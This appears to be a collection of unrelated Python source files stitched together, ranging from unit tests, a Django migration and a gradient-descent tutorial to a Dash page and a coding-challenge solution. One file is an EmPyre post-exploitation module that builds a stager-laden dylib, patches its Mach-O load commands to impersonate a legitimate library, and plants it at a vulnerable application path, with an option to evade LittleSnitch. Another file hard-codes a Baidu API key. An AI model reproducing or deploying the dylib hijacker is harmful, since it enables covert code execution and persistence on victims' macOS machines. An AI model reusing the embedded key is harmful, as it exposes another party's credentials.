from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderIntervalinSec']))
def add(self):
return self._create(self._map_locals(self._SDM_ATT_MAP, locals()))
| python |
from binary_search_tree.e_search_bst import BinarySearchTree
from binarytree import build
class TestBinarySearchTree:
def test_null_node(self):
bst = BinarySearchTree()
ans = bst.searchBST(None, 10)
assert ans is None
def test_root_node(self):
bst = BinarySearchTree()
nodes = [4]
ip = build(nodes)
ans = bst.searchBST(ip, 4)
assert ans == ip
def test_small_tree(self):
bst = BinarySearchTree()
nodes = [4, 2, 7, 1, 3]
ip = build(nodes)
ans = bst.searchBST(ip, 2)
assert ans.left.val == 1
def test_large_tree(self):
bst = BinarySearchTree()
nodes = [18, 9, 27, 6, 15, 24, 30, 3, None, 12, None, 21]
ip = build(nodes)
ans = bst.searchBST(ip, 24)
assert ans.left.val == 21
def test_fail_search(self):
bst = BinarySearchTree()
nodes = [4, 2, 7, 1, 3]
ip = build(nodes)
ans = bst.searchBST(ip, 5)
assert ans is None
| python |
# Generated by Django 4.0.3 on 2022-03-21 06:04
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('inadimplentes', '0010_alter_inquilino_status_de_pagamentos'),
]
operations = [
migrations.RemoveField(
model_name='inquilino',
name='tempo_de_inadimplencia',
),
]
| python |
'''
线性回归:
输入 输出
0.5 5.0
0.6 5.5
0.8 6.0
1.1 6.8
1.4 7.0
...
y = f(x)
预测函数:y = w0+w1x
x: 输入
y: 输出
w0和w1: 模型参数
所谓模型训练,就是根据已知的x和y,找到最佳的模型参数w0 和 w1,尽可能精确地描述出输入和输出的关系。
如:5.0 = w0 + w1 × 0.5 5.5 = w0 + w1 × 0.6
单样本误差:根据预测函数求出输入为x时的预测值:y' = w0 + w1x,单样本误差为1/2(y' - y)2。
总样本误差:把所有单样本误差相加即是总样本误差:1/2 Σ(y' - y)2
损失函数:loss = 1/2 Σ(w0 + w1x - y)2
损失函数就是总样本误差关于模型参数w0 w1的函数,该函数属于三维数学模型,即需要找到一组w0 w1使得loss取极小值。
示例:画图模拟梯度下降的过程
1>整理训练集数据,自定义梯度下降算法规则,求出w0 , w1 ,绘制回归线。
2>绘制随着每次梯度下降,w0,w1,loss的变化曲线。
3>基于三维曲面绘制梯度下降过程中的每一个点。
4>基于等高线的方式绘制梯度下降的过程。
'''
import numpy as np
import matplotlib.pyplot as mp
from mpl_toolkits.mplot3d import axes3d
import warnings
warnings.filterwarnings('ignore')
train_x = np.array([0.5, 0.6, 0.8, 1.1, 1.4])
train_y = np.array([5.0, 5.5, 6.0, 6.8, 7.0])
# 实现梯度下降的过程
times = 1000 # 迭代次数
lrate = 0.01 # 学习率,取值不应太大
w0, w1 = [1], [1] # 初始化模型参数,记录每次梯度下降的参数
losses = [] # 保存每次迭代过程中损失函数值
epoches = [] # 保存每次迭代过程的索引
for i in range(1, times + 1):
# 输出每次下降时:w0,w1,loss值的变化
epoches.append(i)
loss = ((w0[-1] + w1[-1] * train_x - train_y) ** 2).sum() / 2
losses.append(loss)
print('{:4}> w0={:.6f},w1={:.6f},loss={:.6f}'.format(epoches[-1], w0[-1], w1[-1], losses[-1]))
# 每次梯度下降过程,需要求出w0和w1的修正值,求修正值需要推导loss函数在w0及w1方向的偏导数
d0 = (w0[-1] + w1[-1] * train_x - train_y).sum()
d1 = ((w0[-1] + w1[-1] * train_x - train_y) * train_x).sum()
# w0和w1的值不断修正
w0.append(w0[-1] - lrate * d0)
w1.append(w1[-1] - lrate * d1)
print(w0[-1], w1[-1])
pred_y = w0[-1] + w1[-1] * train_x
# 绘制样本点
mp.figure('Linear Regression', facecolor='lightgray')
mp.title('Linear Regression')
mp.grid(linestyle=':')
mp.scatter(train_x, train_y, s=60, c='orangered', label='Samples', marker='o')
# 绘制回归线
mp.plot(train_x, pred_y, color='dodgerblue', label='Regression Line')
mp.legend()
# 绘制随着每次梯度下降,w0,w1,loss的变化曲线。
mp.figure('BGD Params', facecolor='lightgray')
mp.title('BGD Params')
mp.tick_params(labelsize=10)
mp.subplot(311)
mp.title('w0')
mp.plot(epoches, w0[:-1], color='dodgerblue', label='w0')
mp.grid(linestyle=':')
mp.legend()
mp.subplot(312)
mp.title('w1')
mp.plot(epoches, w1[:-1], color='orangered', label='w1')
mp.grid(linestyle=':')
mp.legend()
mp.subplot(313)
mp.title('loss')
mp.plot(epoches, losses, color='yellowgreen', label='loss')
mp.grid(linestyle=':')
mp.legend()
# 基于三维曲面绘制梯度下降过程中的每一个点。
# 整理网格点坐标矩阵,计算每个点的loss绘制曲面
grid_w0, grid_w1 = np.meshgrid(np.linspace(0, 9, 500), np.linspace(0, 3.5, 500))
grid_loss = np.zeros_like(grid_w0)
for x, y in zip(train_x, train_y):
grid_loss += ((grid_w0 + grid_w1 * x - y) ** 2) / 2
# 绘制3D损失函数图
mp.figure('Loss Function', facecolor='lightgray')
ax3d = mp.gca(projection='3d')
ax3d.set_xlabel('w0')
ax3d.set_ylabel('w1')
ax3d.set_zlabel('loss')
ax3d.plot_surface(grid_w0, grid_w1, grid_loss, cmap='jet')
# 绘制3D梯度下降曲线图
ax3d.plot(w0[:-1], w1[:-1], losses, 'o-', color='orangered', label='BGD', zorder=3)
mp.tight_layout()
# 基于等高线的方式绘制梯度下降的过程。
mp.figure('BGD Contour', facecolor='lightgray')
mp.title('BGD Contour')
mp.xlabel('w0')
mp.ylabel('w1')
mp.grid(linestyle=':')
cntr = mp.contour(grid_w0, grid_w1, grid_loss, c='black', linewidths=0.5)
mp.clabel(cntr, fmt='%.2f', inline_spacing=0.2, fontsize=8)
mp.contourf(grid_w0, grid_w1, grid_loss, cmap='jet')
mp.plot(w0[:-1], w1[:-1], c='orangered', label='BGD')
mp.legend()
# mp.show()输出结果:4.065692318299849 2.2634176028710415 | python |
"""Implementation of Rule L020."""
import itertools
from sqlfluff.core.rules.base import BaseCrawler, LintResult
class Rule_L020(BaseCrawler):
"""Table aliases should be unique within each clause."""
def _lint_references_and_aliases(
self,
table_aliases,
value_table_function_aliases,
references,
col_aliases,
using_cols,
parent_select,
):
"""Check whether any aliases are duplicates.
NB: Subclasses of this error should override this function.
"""
# Are any of the aliases the same?
for a1, a2 in itertools.combinations(table_aliases, 2):
# Compare the strings
if a1.ref_str == a2.ref_str and a1.ref_str:
# If there are any, then the rest of the code
# won't make sense so just return here.
return [
LintResult(
# Reference the element, not the string.
anchor=a2.segment,
description=(
"Duplicate table alias {0!r}. Table "
"aliases should be unique."
).format(a2.ref_str),
)
]
return None
@staticmethod
def _has_value_table_function(table_expr, dialect):
if not dialect:
# We need the dialect to get the value table function names. If
# we don't have it, assume the clause does not have a value table
# function.
return False
for function_name in table_expr.recursive_crawl("function_name"):
if function_name.raw.lower() in dialect.sets("value_table_functions"):
return True
return False
@classmethod
def _get_aliases_from_select(cls, segment, dialect=None):
"""Gets the aliases referred to in the FROM clause.
Returns a tuple of two lists:
- Table aliases
- Value table function aliases
"""
fc = segment.get_child("from_clause")
if not fc:
# If there's no from clause then just abort.
return None, None
aliases = fc.get_eventual_aliases()
# We only want table aliases, so filter out aliases for value table
# functions.
table_aliases = []
value_table_function_aliases = []
for table_expr, alias_info in aliases:
if not cls._has_value_table_function(table_expr, dialect):
table_aliases.append(alias_info)
else:
value_table_function_aliases.append(alias_info)
return table_aliases, value_table_function_aliases
def _eval(self, segment, parent_stack, **kwargs):
"""Get References and Aliases and allow linting.
This rule covers a lot of potential cases of odd usages of
references, see the code for each of the potential cases.
Subclasses of this rule should override the
`_lint_references_and_aliases` method.
"""
if segment.is_type("select_statement"):
table_aliases, value_table_function_aliases = self._get_aliases_from_select(
segment, kwargs.get("dialect")
)
if not table_aliases and not value_table_function_aliases:
return None
# Iterate through all the references, both in the select clause, but also
# potential others.
sc = segment.get_child("select_clause")
reference_buffer = list(sc.recursive_crawl("object_reference"))
# Add any wildcard references
reference_buffer += list(sc.recursive_crawl("wildcard_identifier"))
for potential_clause in (
"where_clause",
"groupby_clause",
"having_clause",
"orderby_clause",
):
clause = segment.get_child(potential_clause)
if clause:
reference_buffer += list(clause.recursive_crawl("object_reference"))
# PURGE any references which are in nested select statements
for ref in reference_buffer.copy():
ref_path = segment.path_to(ref)
# is it in a subselect? i.e. a select which isn't this one.
if any(
seg.is_type("select_statement") and seg is not segment
for seg in ref_path
):
reference_buffer.remove(ref)
# Get all column aliases
col_aliases = []
for col_seg in list(sc.recursive_crawl("alias_expression")):
for seg in col_seg.segments:
if seg.is_type("identifier"):
col_aliases.append(seg.raw)
# Get any columns referred to in a using clause, and extract anything
# from ON clauses.
using_cols = []
fc = segment.get_child("from_clause")
for join_clause in fc.recursive_crawl("join_clause"):
in_using_brackets = False
seen_using = False
for seg in join_clause.segments:
if seg.is_type("keyword") and seg.name == "USING":
seen_using = True
elif seg.is_type("join_on_condition"):
for on_seg in seg.segments:
if on_seg.is_type("expression"):
# Deal with expressions
reference_buffer += list(
seg.recursive_crawl("object_reference")
)
elif seen_using and seg.is_type("start_bracket"):
in_using_brackets = True
elif seen_using and seg.is_type("end_bracket"):
in_using_brackets = False
seen_using = False
elif in_using_brackets and seg.is_type("identifier"):
using_cols.append(seg.raw)
# Work out if we have a parent select function
parent_select = None
for seg in reversed(parent_stack):
if seg.is_type("select_statement"):
parent_select = seg
break
# Pass them all to the function that does all the work.
# NB: Subclasses of this rules should override the function below
return self._lint_references_and_aliases(
table_aliases,
value_table_function_aliases,
reference_buffer,
col_aliases,
using_cols,
parent_select,
)
return None
| python |
from django.db import models
class ExchangeRateManager(models.Manager):
def get_query_set(self):
return super(ExchangeRateManager, self).get_query_set()\
.select_related('source', 'target')
def get_rate(self, source_currency, target_currency):
return self.get(source__code=source_currency,
target__code=target_currency).rate
| python |
import base64
class Module:
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'CreateDylibHijacker',
# list of one or more authors for the module
'Author': ['@patrickwardle,@xorrior'],
# more verbose multi-line description of the module
'Description': ('Configures and EmPyre dylib for use in a Dylib hijack, given the path to a legitimate dylib of a vulnerable application. The architecture of the dylib must match the target application. The configured dylib will be copied local to the hijackerPath'),
# True if the module needs to run in the background
'Background' : False,
# File extension to save the file as
'OutputExtension' : "",
'NeedsAdmin' : True,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe' : False,
# list of any references/other comments
'Comments': [
'comment',
'https://www.virusbulletin.com/virusbulletin/2015/03/dylib-hijacking-os-x'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to execute module on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : True,
'Value' : ''
},
'Arch' : {
'Description' : 'Arch: x86/x64',
'Required' : True,
'Value' : 'x86'
},
'LittleSnitch' : {
'Description' : 'Switch. Check for the LittleSnitch process, exit the staging process if it is running. Defaults to True.',
'Required' : True,
'Value' : 'True'
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'LegitimateDylibPath' : {
'Description' : 'Full path to the legitimate dylib of the vulnerable application',
'Required' : True,
'Value' : ''
},
'VulnerableRPATH' : {
'Description' : 'Full path to where the hijacker should be planted. This will be the RPATH in the Hijack Scanner module.',
'Required' : True,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
# the Python script itself, with the command to invoke
# for execution appended to the end. Scripts should output
# everything to the pipeline for proper parsing.
#
# the script should be stripped of comments, with a link to any
# original reference script included in the comments.
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
LittleSnitch = self.options['LittleSnitch']['Value']
arch = self.options['Arch']['Value']
launcher = self.mainMenu.stagers.generate_launcher(listenerName, userAgent=userAgent, littlesnitch=LittleSnitch)
launcher = launcher.strip('echo').strip(' | python &').strip("\"")
dylibBytes = self.mainMenu.stagers.generate_dylib(launcherCode=launcher, arch=arch, hijacker='true')
encodedDylib = base64.b64encode(dylibBytes)
dylib = self.options['LegitimateDylibPath']['Value']
vrpath = self.options['VulnerableRPATH']['Value']
script = """
from ctypes import *
def run(attackerDYLIB):
import ctypes
import io
import os
import sys
import fcntl
import shutil
import struct
import stat
LC_REQ_DYLD = 0x80000000
LC_LOAD_WEAK_DYLIB = LC_REQ_DYLD | 0x18
LC_RPATH = (0x1c | LC_REQ_DYLD)
LC_REEXPORT_DYLIB = 0x1f | LC_REQ_DYLD
(
LC_SEGMENT, LC_SYMTAB, LC_SYMSEG, LC_THREAD, LC_UNIXTHREAD, LC_LOADFVMLIB,
LC_IDFVMLIB, LC_IDENT, LC_FVMFILE, LC_PREPAGE, LC_DYSYMTAB, LC_LOAD_DYLIB,
LC_ID_DYLIB, LC_LOAD_DYLINKER, LC_ID_DYLINKER, LC_PREBOUND_DYLIB,
LC_ROUTINES, LC_SUB_FRAMEWORK, LC_SUB_UMBRELLA, LC_SUB_CLIENT,
LC_SUB_LIBRARY, LC_TWOLEVEL_HINTS, LC_PREBIND_CKSUM
) = range(0x1, 0x18)
MH_MAGIC = 0xfeedface
MH_CIGAM = 0xcefaedfe
MH_MAGIC_64 = 0xfeedfacf
MH_CIGAM_64 = 0xcffaedfe
_CPU_ARCH_ABI64 = 0x01000000
CPU_TYPE_NAMES = {
-1: 'ANY',
1: 'VAX',
6: 'MC680x0',
7: 'i386',
_CPU_ARCH_ABI64 | 7: 'x86_64',
8: 'MIPS',
10: 'MC98000',
11: 'HPPA',
12: 'ARM',
13: 'MC88000',
14: 'SPARC',
15: 'i860',
16: 'Alpha',
18: 'PowerPC',
_CPU_ARCH_ABI64 | 18: 'PowerPC64',
}
#structs that we need
class mach_header(ctypes.Structure):
_fields_ = [
("magic", ctypes.c_uint),
("cputype", ctypes.c_uint),
("cpusubtype", ctypes.c_uint),
("filetype", ctypes.c_uint),
("ncmds", ctypes.c_uint),
("sizeofcmds", ctypes.c_uint),
("flags", ctypes.c_uint)
]
class mach_header_64(ctypes.Structure):
_fields_ = mach_header._fields_ + [('reserved',ctypes.c_uint)]
class load_command(ctypes.Structure):
_fields_ = [
("cmd", ctypes.c_uint),
("cmdsize", ctypes.c_uint)
]
LC_HEADER_SIZE = 0x8
def checkPrereqs(attackerDYLIB, targetDYLIB):
if not os.path.exists(attackerDYLIB):
print 'ERROR: dylib \\'%%s\\' not found' %% (attackerDYLIB)
return False
if not os.path.exists(targetDYLIB):
print 'ERROR: dylib \\'%%s\\' not found' %% (targetDYLIB)
return False
attacker = open(attackerDYLIB)
target = open(targetDYLIB)
attackerHeader = mach_header.from_buffer_copy(attacker.read(28))
targetHeader = mach_header.from_buffer_copy(target.read(28))
if attackerHeader.cputype != targetHeader.cputype:
print 'ERROR: Architecture mismatch'
attacker.close()
target.close()
return False
return True
def findLoadCommand(fileHandle, targetLoadCommand):
MACHHEADERSZ64 = 32
MACHHEADERSZ = 28
matchedOffsets = []
#wrap
try:
header = mach_header.from_buffer_copy(fileHandle.read(MACHHEADERSZ))
if header.magic == MH_MAGIC_64:
fileHandle.seek(0, io.SEEK_SET)
header = mach_header_64.from_buffer_copy(fileHandle.read(MACHHEADERSZ64))
ncmds = header.ncmds
# Get to the load commands
current = fileHandle.tell() #save offset to load command
for cmd in range(ncmds):
offset = current
lc = load_command.from_buffer_copy(fileHandle.read(LC_HEADER_SIZE))
size = lc.cmdsize
if lc.cmd == targetLoadCommand:
matchedOffsets.append(offset)
fileHandle.seek(size - LC_HEADER_SIZE, io.SEEK_CUR)
current = fileHandle.tell()
#exceptions
except Exception, e:
#err msg
print 'EXCEPTION (finding load commands): %%s' %% e
#reset
matchedOffsets = None
return matchedOffsets
#configure version info
# 1) find/extract version info from target .dylib
# 2) find/update version info from hijacker .dylib to match target .dylib
def configureVersions(attackerDYLIB, targetDYLIB):
#wrap
try:
#dbg msg
print ' [+] parsing \\'%%s\\' to extract version info' %% (os.path.split(targetDYLIB)[1])
#open target .dylib
fileHandle = open(targetDYLIB, 'rb')
#find LC_ID_DYLIB load command
# ->and check
versionOffsets = findLoadCommand(fileHandle, LC_ID_DYLIB)
if not versionOffsets or not len(versionOffsets):
#err msg
print 'ERROR: failed to find \\'LC_ID_DYLIB\\' load command in %%s' %% (os.path.split(targetDYLIB)[1])
#bail
return False
#dbg msg
print ' found \\'LC_ID_DYLIB\\' load command at offset(s): %%s' %% (versionOffsets)
#seek to offset of LC_ID_DYLIB
fileHandle.seek(versionOffsets[0], io.SEEK_SET)
#seek to skip over LC header and timestamp
fileHandle.seek(LC_HEADER_SIZE+0x8, io.SEEK_CUR)
'''
struct dylib { union lc_str name; uint_32 timestamp; uint_32 current_version; uint_32 compatibility_version; };
'''
#extract current version
currentVersion = fileHandle.read(4)
#extract compatibility version
compatibilityVersion = fileHandle.read(4)
#dbg msg(s)
print ' extracted current version: 0x%%x' %% (struct.unpack('<L', currentVersion)[0])
print ' extracted compatibility version: 0x%%x' %% (struct.unpack('<L', compatibilityVersion)[0])
#close
fileHandle.close()
#dbg msg
print ' [+] parsing \\'%%s\\' to find version info' %% (os.path.split(attackerDYLIB)[1])
#open target .dylib
fileHandle = open(attackerDYLIB, 'rb+')
#find LC_ID_DYLIB load command
# ->and check
versionOffsets = findLoadCommand(fileHandle, LC_ID_DYLIB)
if not versionOffsets or not len(versionOffsets):
#err msg
print 'ERROR: failed to find \\'LC_ID_DYLIB\\' load command in %%s' %% (os.path.split(attackerDYLIB)[1])
#bail
return False
#dbg msg(s)
print ' found \\'LC_ID_DYLIB\\' load command at offset(s): %%s' %% (versionOffsets)
print ' [+] updating version info in %%s to match %%s' %% ((os.path.split(attackerDYLIB)[1]), (os.path.split(targetDYLIB)[1]))
#update version info
for versionOffset in versionOffsets:
#seek to offset of LC_ID_DYLIB
fileHandle.seek(versionOffset, io.SEEK_SET)
#seek to skip over LC header and timestamp
fileHandle.seek(LC_HEADER_SIZE+0x8, io.SEEK_CUR)
#dbg msg
print 'setting version info at offset %%s' %% (versionOffset)
#set current version
fileHandle.write(currentVersion)
#set compatability version
fileHandle.write(compatibilityVersion)
#close
fileHandle.close()
except Exception, e:
#err msg
print 'EXCEPTION (configuring version info): %%s' %% e
return True
#configure re-export
# ->update hijacker .dylib to re-export everything to target .dylib
def configureReExport(attackerDYLIB, targetDYLIB):
#wrap
try:
#dbg msg
print ' [+] parsing \\'%%s\\' to extract faux re-export info' %% (os.path.split(attackerDYLIB)[1])
#open attacker's .dylib
fileHandle = open(attackerDYLIB, 'rb+')
#find LC_REEXPORT_DYLIB load command
# ->and check
reExportOffsets = findLoadCommand(fileHandle, LC_REEXPORT_DYLIB)
if not reExportOffsets or not len(reExportOffsets):
#err msg
print 'ERROR: failed to find \\'LC_REEXPORT_DYLIB\\' load command in %%s' %% (os.path.split(attackerDYLIB)[1])
#bail
return False
#dbg msg
print ' found \\'LC_REEXPORT_DYLIB\\' load command at offset(s): %%s' %% (reExportOffsets)
'''
struct dylib { union lc_str name; uint_32 timestamp; uint_32 current_version; uint_32 compatibility_version; };
'''
#update re-export info
#TODO: does the current and compat version need to match? we can easily set it
for reExportOffset in reExportOffsets:
#seek to offset of LC_REEXPORT_DYLIB
fileHandle.seek(reExportOffset, io.SEEK_SET)
#seek to skip over command
fileHandle.seek(0x4, io.SEEK_CUR)
#read in size of load command
commandSize = struct.unpack('<L', fileHandle.read(4))[0]
#dbg msg
print ' extracted LC command size: 0x%%x' %% (commandSize)
#read in path offset
pathOffset = struct.unpack('<L', fileHandle.read(4))[0]
#dbg msg
print ' extracted path offset: 0x%%x' %% (pathOffset)
#seek to path offset
fileHandle.seek(reExportOffset + pathOffset, io.SEEK_SET)
#calc length of path
# it makes up rest of load command data
pathSize = commandSize - (fileHandle.tell() - reExportOffset)
#dbg msg
print ' computed path size: 0x%%x' %% (pathSize)
#read out path
data = targetDYLIB + '\\0' * (pathSize - len(targetDYLIB))
fileHandle.write(data)
#path can include NULLs so lets chop those off
#path = path.rstrip('\0')
#dbg msg(s)
#print ' extracted faux path: %%s' %% (path)
#close
fileHandle.close()
#dbg msg
print ' [+] updated embedded re-export'
#wrap
#handle exceptions
except Exception, e:
#err msg
print 'EXCEPTION (configuring re-exports): %%s' %% e
#bail
return False
return True
def configure(attackerDYLIB, targetDYLIB):
#configure version info
# ->update attacker's .dylib to match target .dylib's version info
if not configureVersions(attackerDYLIB, targetDYLIB):
#err msg
print 'ERROR: failed to configure version info'
#bail
return False
#configure re-export
# ->update attacker's .dylib to re-export everything to target .dylib
if not configureReExport(attackerDYLIB, targetDYLIB):
#err msg
print 'ERROR: failed to configure re-export'
#bail
return False
return True
#target .dylib
targetDYLIB = "%s"
vrpath = "%s"
#configured .dylib
configuredDYLIB = ""
#init output path for configured .dylib
configuredDYLIB = os.path.split(attackerDYLIB)[0]+'/' + os.path.split(targetDYLIB)[1]
#dbg msg
print ' [+] configuring %%s to hijack %%s' %% (os.path.split(attackerDYLIB)[1], os.path.split(targetDYLIB)[1])
#check prereqs
# ->i.e. sanity checks
if not checkPrereqs(attackerDYLIB, targetDYLIB):
#err msg
print 'ERROR: prerequisite check failed\\n'
#bail
return ""
#configure the provide .dylib
if not configure(attackerDYLIB, targetDYLIB):
#err msg
print 'ERROR: failed to configure %%s\\n' %% (os.path.split(targetDYLIB)[1])
#bail
return ""
#dbg msg
print ' [+] copying configured .dylib to %%s' %% (configuredDYLIB)
#make a (local) copy w/ name
shutil.copy2(attackerDYLIB, configuredDYLIB)
os.remove(attackerDYLIB)
if not os.path.exists(os.path.split(vrpath)[0]):
os.makedirs(os.path.split(vrpath)[0])
os.chmod(configuredDYLIB, 0777)
shutil.copy2(configuredDYLIB, vrpath)
os.remove(configuredDYLIB)
#dbg msg
print '\\nHijacker created, renamed to %%s, and copied to %%s' %% (configuredDYLIB,vrpath)
import base64
import uuid
encbytes = "%s"
filename = str(uuid.uuid4())
path = "/tmp/" + filename + ".dylib"
decodedDylib = base64.b64decode(encbytes)
temp = open(path,'wb')
temp.write(decodedDylib)
temp.close()
run(path)
""" % (dylib,vrpath,encodedDylib)
return script
| python |
import dash_html_components as html
import dash_core_components as dcc
import dash_bootstrap_components as dbc
from dash.dependencies import Output,Input,State
from dash import no_update
import random
from flask_login import current_user
import time
from functools import wraps
from server import app
login_alert = dbc.Alert(
'User not logged in. Taking you to login.',
color='danger'
)
location = dcc.Location(id='page1-url',refresh=True)
def layout():
#if current_user.is_authenticated:
return dbc.Row(
dbc.Col(
[
location,
html.Div(id='page1-login-trigger'),
html.H1('Page1'),
html.Br(),
html.H5('Welcome to Page1!'),
html.Br(),
html.Div(id='page1-test-trigger'),
dcc.Loading(html.Iframe(id='page1-test',style=dict(height='500px',width='100%')),id='page1-loading')
],
width=6
)
)
@app.callback(
Output('page1-test','src'),
[Input('page1-test-trigger','children')]
)
def page1_test_update(trigger):
'''
updates iframe with example.com
'''
time.sleep(2)
return 'http://example.com/'
| python |
# -*- coding: utf-8 -*-
"""Namespace Service
The namespace service is responsible for
* Providing the default namespace from config
* Providing list of all known namespaces
"""
from typing import List
from brewtils.models import Garden, Request, System
import beer_garden.db.api as db
import beer_garden.config as config
def default() -> str:
"""Get the default namespace for this Garden
Returns:
The default namespace
"""
return config.get("garden.name")
def get_namespaces() -> List[str]:
"""Get the distinct namespaces in the Garden
Returns:
List
"""
namespaces = set(
set(db.distinct(Request, "namespace")) | set(db.distinct(System, "namespace"))
)
for garden in db.query(Garden, include_fields=["namespaces"]):
namespaces |= set(garden.namespaces)
# Filter out None, empty string
namespaces = filter(lambda x: x, namespaces)
return list(namespaces)
| python |
from dancingshoes.helpers import GlyphNamesFromFontLabFont, AssignFeatureCodeToFontLabFont
from myFP.features import MakeDancingShoes
f = fl.font
fl.output = ''
glyphnames = GlyphNamesFromFontLabFont(f)
shoes = MakeDancingShoes(glyphnames)
AssignFeatureCodeToFontLabFont(f, shoes)
# Verbose output
if shoes.Infos():
print shoes.Infos()
if shoes.Warnings():
print shoes.Warnings()
if shoes.Errors():
print shoes.Errors()
print 'I enjoyed dancing with you...'
| python |
# Copyright 2018 Xanadu Quantum Technologies Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Unit tests for the :mod:`pennylane_pq` device initialization
"""
import unittest
import logging as log
from defaults import pennylane as qml, BaseTest
from pennylane import DeviceError
from pennylane_pq.devices import ProjectQIBMBackend
import os
token = os.getenv("IBMQX_TOKEN")
log.getLogger('defaults')
class DeviceInitialization(BaseTest):
"""test aspects of the device initialization.
"""
num_subsystems = 4
devices = None
def test_ibm_no_token(self):
if self.args.device == 'ibm' or self.args.device == 'all':
self.assertRaises(ValueError, ProjectQIBMBackend, wires=self.num_subsystems, use_hardware=False)
def test_shots(self):
if self.args.device == 'ibm' or self.args.device == 'all':
shots = 5
dev1 = ProjectQIBMBackend(wires=self.num_subsystems, shots=shots, use_hardware=False, token=token, verbose=True)
self.assertEqual(shots, dev1.shots)
dev2 = ProjectQIBMBackend(wires=self.num_subsystems, num_runs=shots, use_hardware=False, token=token)
self.assertEqual(shots, dev2.shots)
dev2 = ProjectQIBMBackend(wires=self.num_subsystems, shots=shots+2, num_runs=shots, use_hardware=False,
token=token)
self.assertEqual(shots, dev2.shots)
def test_initiatlization_via_pennylane(self):
for short_name in [
'projectq.simulator',
'projectq.classical',
'projectq.ibm'
]:
try:
dev = qml.device(short_name, wires=2, token=token, verbose=True)
except DeviceError:
raise Exception("This test is expected to fail until pennylane-pq is installed.")
if __name__ == '__main__':
print('Testing PennyLane ProjectQ Plugin version ' + qml.version() + ', device initialization.')
# run the tests in this file
suite = unittest.TestSuite()
for t in (DeviceInitialization, ):
ttt = unittest.TestLoader().loadTestsFromTestCase(t)
suite.addTests(ttt)
unittest.TextTestRunner().run(suite)
| python |
#!/usr/bin/env python
# encoding: utf-8
# File : test_processor.py
# Author : Ben Wu
# Contact : [email protected]
# Date : 2019 Mar 06
#
# Description :
import sys
import os
sys.path.insert(1, "%s/../.." % os.path.dirname(os.path.abspath(__file__)))
from NanoUpTools.framework import processor
from NanoUpTools.framework.module import Module
from NanoUpTools.modules.QCD_HEMStudy import QCDHEMVeto
class temp(Module):
def analyze(self, events):
self.th1("NJetsISR" , events["nISRJets"] , 10 , 0 , 10)
self.th1("pu" , events["nISRJets"] , 10 , 0 , 10)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description='Process some integers.')
parser.add_argument('--inputFiles', default="./TTbarInc.txt", help='an integer for the accumulator')
parser.add_argument('--outputFile', default="out.root")
args = parser.parse_args()
g = processor(args.outputFile, args.inputFiles, [temp("temp")], branches=["nISRJets"])
g.run()
| python |
#!/bin/python3
import os
# Complete the maximumPeople function below.
def maximumPeople(p, x, y, r):
# Return the maximum number of people that will be in a sunny town after removing exactly one cloud.
import operator
# make list of cloud tuples with start and end
clouds = []
for location_cloud, range_cloud in zip(y, r):
clouds.append((max(location_cloud - range_cloud, 0), location_cloud + range_cloud))
# sort by start
clouds.sort(key=lambda v: v[0])
# make list of town tuples with position and people
towns = []
for location_town, population_town in zip(x, p):
towns.append((location_town, population_town))
# sort by start
towns.sort(key=lambda v: v[0])
# add a ghost cloud (to do all in one while loop)
last_town_location = towns[-1][0]
last_cloud = clouds[-1][1]
ghost_location = max(last_town_location, last_cloud) + 100
# insert ghost cloud
clouds.append((ghost_location, ghost_location))
# end of the current cloud interval
current_end = -10 * 9
# counter to check solely covered people by current cloud
covered = 0
# counter for people not covered by a cloud at all
uncovered = 0
# to remember maximum count
max_covered = 0
# index for the
t_idx = 0
# helper function to count people before a certain position
def count(pos, exc=False):
res = 0
nonlocal t_idx
# uses less than or less or equal operator
op = operator.lt if exc else operator.le
while t_idx < len(towns) and op(towns[t_idx][0], pos):
# op: a<b or a<=b
res += towns[t_idx][1]
t_idx += 1
return res
# the actual algorithm
# there are three cases considered:
for start, end in clouds:
# next cloud start after the end of old cloud
if start > current_end:
covered += count(current_end)
max_covered = max(max_covered, covered)
covered = 0
uncovered += count(start, exc=True)
current_end = end
# next cloud starts and ends before the next cloud
elif start <= current_end and end < current_end:
covered += count(start, exc=True)
count(end)
# or it start before but ends later
elif start <= current_end <= end:
covered += count(start, exc=True)
max_covered = max(max_covered, covered)
covered = 0
count(current_end)
current_end = end
return max_covered + uncovered
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
n = int(input())
p = list(map(int, input().rstrip().split()))
x = list(map(int, input().rstrip().split()))
m = int(input())
y = list(map(int, input().rstrip().split()))
r = list(map(int, input().rstrip().split()))
result = maximumPeople(p, x, y, r)
fptr.write(str(result) + '\n')
fptr.close()
| python |
from .subsample import ExtractPatches
from .augment import Flip_Rotate_2D, Shift_Squeeze_Intensities, Flip_Rotate_3D, MaskData | python |
import requests
class Config:
ak = "PmkYQbXLGxqHnQvRktDZCGMSHGOil2Yx"
ride_url_temp = "http://api.map.baidu.com/direction/v2/riding?origin={},{}&destination={},{}&ak={}"
